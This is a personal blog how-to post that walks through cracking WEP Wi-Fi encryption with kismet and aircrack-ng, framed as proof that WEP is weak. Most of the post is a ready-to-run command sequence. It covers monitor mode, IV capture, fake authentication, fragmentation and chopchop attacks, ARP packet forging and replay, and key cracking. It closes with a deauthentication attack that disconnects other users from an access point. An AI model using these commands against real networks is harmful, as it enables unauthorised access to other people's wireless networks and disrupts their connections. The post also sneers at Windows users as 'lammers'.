Felipe FerreiraHowTo, Linux, Security

I have cracked WEP from my own AP, I found amazing how easy it can be done.
So DO NOT TRUST in just WEP.Using kismet and aircrack-ng I was able to crack in less then 20min.
p.s. For those lammers that still use windows I sugest using this top of the line Live CD called BackTrack http://www.remote-exploit.org/backtrack_download.html
Another ways are out there to crack it, I would also recommend a less manual method by using de Live-CD called Wifiway, download or just use the one bellow plus the script called airoway, download
Install kismet
#apt-get install kismet
Start Kismet, you will need your wifi dirver
#lshw -C network
or
#dmesg| grep ipw
or
#dmesg| grep wl
To find more info on your Driver
#sudo lsmod | grep iwl4965
Start Kismet
#kismet -c rt2500,rausb0,wifi
or
#kismet -c iwl4965,wlan0,Wifi
(if it dosent work)
The problem of this drivers with kismet is that you can’t put your card in “monitor mode”.
Try this:
#iwconfig wlan0 mode monitor
Once you have the GUI, type H for help or “S” then “p” to sort by Packet Count,
now scroll and hit “I” for more info on the one you wish. Take note of Channel, BSSID, SSID,
shift-L to lock where you want then follow instructions bellow.
Save your configuration,
#gedit /etc/kismet/kismet.conf and enter in the line 27:
#source=iwl4965,wlan0,Wifi
Install aircrack-ng tools
#apt-get install aircrack-ng
Dump IVS, –ivs -w (will write only IVS traffic to file capB) pass channel and Bssid as args.
#airodump-ng rausb0 –ivs -w WLAN_1A -a –channel 06 –bssid 00:01:38:6D:2E:26
Open another terminal and start to authenticate.
1- Authenticating With AP, will SPPED UP, Generating IVS
# aireplay-ng -1 5 -o 1 -q 10 -e “WLAN_1A” -a 00:01:38:6D:2E:26 -h 00:12:17:88:50:A9 rausb0
00:12:17:88:50:A9
2.Geting XOR packet to replay
A- Fragmentation attack
# aireplay-ng -5 -b 00:01:38:6D:2E:26 -h 00:12:17:88:50:A9 rausb0
B- chopchop attack
# aireplay-ng -4 -b 00:19:5B:9C:68:FA -h 00:12:17:88:50:A9 rausb0
Generated .xor and .cap files
3.Create ARP Request Packer
# packetforge-ng -0 -a 00:01:38:6D:2E:26 -h 00:12:17:88:50:a9 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0821-224752.xor -w arp-request
Once authenticate is Ok and you have the packet, in another terminal do:
4-Replay ARP Traffic (Note IVS increase!)
# aireplay-ng -2 -x 45 -r arp-request rausb0
Once you get about 20.000 (on #DATA) you can start trying but usually with aroung 40-60k it should crack it
5-Cracking WEP while DUmping
# aircrack-ng -f 2 -b 00:C0:A8:B4:97:ED -n 64 capA-03.ivs
or
# aircrack-ng -z -b 00:01:38:87:E8:79 D*.cap
Deauth Attack, You can Deauthanticate people from the AP (same time should have airodump)
# aireplay-ng –deauth 1 -a 00:16:38:C4:9F:AD -c 01:80:C2:00:00:00 rausb0
Tags: aircrack-ng, hack wep, kismet, security, wep crack
Posted in HowTo, Linux | No Comments »

Tags: , , , ,

Leave a Reply

Your email address will not be published. Required fields are marked *